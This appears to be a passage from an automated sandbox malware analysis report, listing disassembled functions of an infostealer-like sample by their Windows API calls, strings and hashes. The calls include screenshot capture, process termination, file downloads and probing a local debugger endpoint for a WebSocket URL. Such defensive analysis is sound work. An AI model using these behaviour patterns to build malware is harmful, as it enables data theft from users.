                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 13140697-3278919252
                              • Opcode ID: c7746a885125278c2bcebb7bf5540ee50af0d0ff6c01311dac4210fec40c9d68
                              • Instruction ID: 0d09a9d9b906e4bd253b43723a6f009e3bc91a92bf2e0672ecfaeebc13c1414e
                              • Opcode Fuzzy Hash: c7746a885125278c2bcebb7bf5540ee50af0d0ff6c01311dac4210fec40c9d68
                              • Instruction Fuzzy Hash: CD91C1B2900208DFCB20DFA4D9849DEB7B8FB88315F149969FA09B7215D7369E45CF90
                              Function 00E390C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                              Download Yara Rule
                              APIs
                              • InternetOpenA.WININET(00E5CFEC,00000001,00000000,00000000,00000000), ref: 00E390DF
                              • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00E390FC
                              • InternetCloseHandle.WININET(00000000), ref: 00E39109
                              • InternetReadFile.WININET(?,?,?,00000000), ref: 00E39166
                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00E39197
                              • InternetCloseHandle.WININET(00000000), ref: 00E391A2
                              • InternetCloseHandle.WININET(00000000), ref: 00E391A9
                              • strlen.MSVCRT ref: 00E391BA
                              • strlen.MSVCRT ref: 00E391ED
                              • strlen.MSVCRT ref: 00E3922E
                              • strlen.MSVCRT ref: 00E3924C
                                • Part of subcall function 00E38980: std::_Xinvalid_argument.LIBCPMT ref: 00E38996
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                              • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                              • API String ID: 1530259920-2144369209
                              • Opcode ID: 22cafe83cc71afc7809fcfeb290eb7b7c99648088f056bde333201a4cd282f99
                              • Instruction ID: e9d9d1d5e3d8db443c57c22566ecca31aa8188a9162e630b00b3d35849e3c156
                              • Opcode Fuzzy Hash: 22cafe83cc71afc7809fcfeb290eb7b7c99648088f056bde333201a4cd282f99
                              • Instruction Fuzzy Hash: C851D171640305ABD720DBA8EC49BEEBBF9DB48710F141569F904F3281DBB59A48C7A1
                              Function 00E51660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00E516A1
                              • lstrcpy.KERNEL32(00000000,00D1A6E0), ref: 00E516CC
                              • lstrlen.KERNEL32(?), ref: 00E516D9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E516F6
                              • lstrcat.KERNEL32(00000000,?), ref: 00E51704
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5172A
                              • lstrlen.KERNEL32(00D2F0A0), ref: 00E5173F
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E51762
                              • lstrcat.KERNEL32(00000000,00D2F0A0), ref: 00E5176A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51792
                              • ShellExecuteEx.SHELL32(?), ref: 00E517CD
                              • ExitProcess.KERNEL32 ref: 00E51803
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                              • String ID: <
                              • API String ID: 3579039295-4251816714
                              • Opcode ID: d6a1695d8716e5b7e37980e7fd5a1d44b63c203a550cc95ff1b9b2888567e3a0
                              • Instruction ID: 9df2b5fbfa3c056858771293a814ee94f2ec12ed1c80d67e48b61a96dc307331
                              • Opcode Fuzzy Hash: d6a1695d8716e5b7e37980e7fd5a1d44b63c203a550cc95ff1b9b2888567e3a0
                              • Instruction Fuzzy Hash: 7351D670901319DFDB21DFA8C888B9EBBF9AF48305F00546AEA45F3255DB35AE05CB90
                              Function 00E4EFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4EFE4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4F012
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E4F026
                              • lstrlen.KERNEL32(00000000), ref: 00E4F035
                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 00E4F053
                              • StrStrA.SHLWAPI(00000000,?), ref: 00E4F081
                              • lstrlen.KERNEL32(?), ref: 00E4F094
                              • lstrlen.KERNEL32(00000000), ref: 00E4F0B2
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 00E4F0FF
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 00E4F13F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$AllocLocal
                              • String ID: ERROR
                              • API String ID: 1803462166-2861137601
                              • Opcode ID: 03520d0a35d30c8f6c5c2ac7f5674002b77878bb9dc8beb2649cfdf228440315
                              • Instruction ID: 3ca12e0af2df077f54cbc5441f02bcb1bee90ba7944e6286732b433bdce1503c
                              • Opcode Fuzzy Hash: 03520d0a35d30c8f6c5c2ac7f5674002b77878bb9dc8beb2649cfdf228440315
                              • Instruction Fuzzy Hash: 1D51AF319112059FCB31AF78E849AAE7BE4AF84744F05616DF98ABB316DB31DC01CB90
                              Function 00E3A010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                              Download Yara Rule
                              APIs
                              • GetEnvironmentVariableA.KERNEL32(00D28938,01069BD8,0000FFFF), ref: 00E3A026
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3A053
                              • lstrlen.KERNEL32(01069BD8), ref: 00E3A060
                              • lstrcpy.KERNEL32(00000000,01069BD8), ref: 00E3A08A
                              • lstrlen.KERNEL32(00E64C4C), ref: 00E3A095
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3A0B2
                              • lstrcat.KERNEL32(00000000,00E64C4C), ref: 00E3A0BE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3A0E4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3A0EF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3A114
                              • SetEnvironmentVariableA.KERNEL32(00D28938,00000000), ref: 00E3A12F
                              • LoadLibraryA.KERNEL32(00D16340), ref: 00E3A143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                              • String ID:
                              • API String ID: 2929475105-0
                              • Opcode ID: 0c2c914e0b680171e48838c659a908b5598cb530cf9372402ca6e7be6d525b26
                              • Instruction ID: a5470342d11e55688d194bb37baeefe4f2b8d5c6be82de29b8b9d944b2164d73
                              • Opcode Fuzzy Hash: 0c2c914e0b680171e48838c659a908b5598cb530cf9372402ca6e7be6d525b26
                              • Instruction Fuzzy Hash: A691D4716007009FD7309FA4D84CA673FF5EB54708F58A429E5C5AB666EB7ACC80CB92
                              Function 00E4C840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4C8A2
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4C8D1
                              • lstrlen.KERNEL32(00000000), ref: 00E4C8FC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4C932
                              • StrCmpCA.SHLWAPI(00000000,00E64C3C), ref: 00E4C943
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 754b66280d6cae349ca768acc47edbf6d31d23fe8d418b15cf3af5bde1e07223
                              • Instruction ID: 5e850aca9c5bf2884bcedc92b288fc642a622e0f2fdc2746b4d284c8291d9cfe
                              • Opcode Fuzzy Hash: 754b66280d6cae349ca768acc47edbf6d31d23fe8d418b15cf3af5bde1e07223
                              • Instruction Fuzzy Hash: 1F61D871D023199FDB60DFB4D848AAE7BF8AF09348F206569E982F7201D735D945CBA0
                              Function 00E54500 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 95memoryCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 00E5451A
                              • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00E44F39), ref: 00E54545
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E5454C
                              • wsprintfW.USER32 ref: 00E5455B
                              • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 00E545CA
                              • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00E545D9
                              • CloseHandle.KERNEL32(00000000,?,?), ref: 00E545E0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                              • String ID: 9O$%hs$9O
                              • API String ID: 3729781310-2037051700
                              • Opcode ID: c5868fd33560ff40eceb144d44734f95b0490fb6cdd56efbde1187195e465739
                              • Instruction ID: 6c8e3a337b56def945d5c94b3808edc2e6d050206ee57256dbb32e5372175983
                              • Opcode Fuzzy Hash: c5868fd33560ff40eceb144d44734f95b0490fb6cdd56efbde1187195e465739
                              • Instruction Fuzzy Hash: EC319EB2A00205BFEB20DBA0DC49FDEB778AF44705F104455FA05A7184EB75AA458BA5
                              Function 00E541E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00E50CF0), ref: 00E54276
                              • GetDesktopWindow.USER32 ref: 00E54280
                              • GetWindowRect.USER32(00000000,?), ref: 00E5428D
                              • SelectObject.GDI32(00000000,00000000), ref: 00E542BF
                              • GetHGlobalFromStream.COMBASE(00E50CF0,?), ref: 00E54336
                              • GlobalLock.KERNEL32(?), ref: 00E54340
                              • GlobalSize.KERNEL32(?), ref: 00E5434D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                              • String ID:
                              • API String ID: 1264946473-0
                              • Opcode ID: 971e47e717eb89542b9e1bdf3c6e53b9d54d37edc0900e1b59a5a40368e0bb16
                              • Instruction ID: 436d03ae0d6311f9c2e7413152a886acb4a6542d6b0b6f34ae084ec249faaeaf
                              • Opcode Fuzzy Hash: 971e47e717eb89542b9e1bdf3c6e53b9d54d37edc0900e1b59a5a40368e0bb16
                              • Instruction Fuzzy Hash: 02514175910208AFDB20DFA4DC89EEE7BB9EF48305F105419FA45E3254DB35AE45CBA0
                              Function 00E4DFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,00D2F320), ref: 00E4E00D
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E4E037
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E06F
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4E07D
                              • lstrcat.KERNEL32(?,?), ref: 00E4E098
                              • lstrcat.KERNEL32(?,?), ref: 00E4E0AC
                              • lstrcat.KERNEL32(?,00D1A5F0), ref: 00E4E0C0
                              • lstrcat.KERNEL32(?,?), ref: 00E4E0D4
                              • lstrcat.KERNEL32(?,00D2E458), ref: 00E4E0E7
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E11F
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00E4E126
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 4230089145-0
                              • Opcode ID: 225be4cd3bf93f490067f5c622a50cb1ec2d4f8e643db74e0dd7d7de7bd053dc
                              • Instruction ID: f88ac64a0db11b52e54fd71c6caf6f32107ee872031e26d6f2d10bc9f745fcac
                              • Opcode Fuzzy Hash: 225be4cd3bf93f490067f5c622a50cb1ec2d4f8e643db74e0dd7d7de7bd053dc
                              • Instruction Fuzzy Hash: 4161BD7191021CAFDB21DB64D848ADDB7B8BF48300F1059A8F68AA3351DB74AF85DF90
                              Function 00E36AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E36AFF
                              • InternetOpenA.WININET(00E5CFEC,00000001,00000000,00000000,00000000), ref: 00E36B2C
                              • StrCmpCA.SHLWAPI(?,00D2FAE0), ref: 00E36B4A
                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00E36B6A
                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E36B88
